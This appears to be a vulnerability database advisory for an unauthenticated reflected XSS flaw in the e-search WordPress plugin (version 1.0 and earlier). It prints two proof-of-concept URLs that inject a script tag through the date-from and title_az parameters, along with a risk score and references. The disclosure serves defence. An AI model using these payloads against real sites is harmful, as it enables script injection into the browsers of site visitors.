e-search <= 1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)

2016-04-1300:00:00

ethicalhack3r

0.001 Low

EPSS

Percentile

50.3%

JSON

The e-search WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.

http://www.example.com/wp-content/plugins/e-search/tmpl/date_select.php?date-from="><script>alert(1);</script><"

http://www.example.com/wp-content/plugins/e-search/tmpl/title_az.php?title_az="><script>alert(1);</script><"

References

www.vapidlabs.com/wp/wp_advisory.php?v=393

www.vapidlabs.com/wp/wp_advisory.php?v=394

www.openwall.com/lists/oss-security/2016/04/12/8

0.001 Low

EPSS

Percentile

50.3%

JSON

Related for WPEX-ID:5329B68A-34CB-4423-88C9-00D7E89AA6C6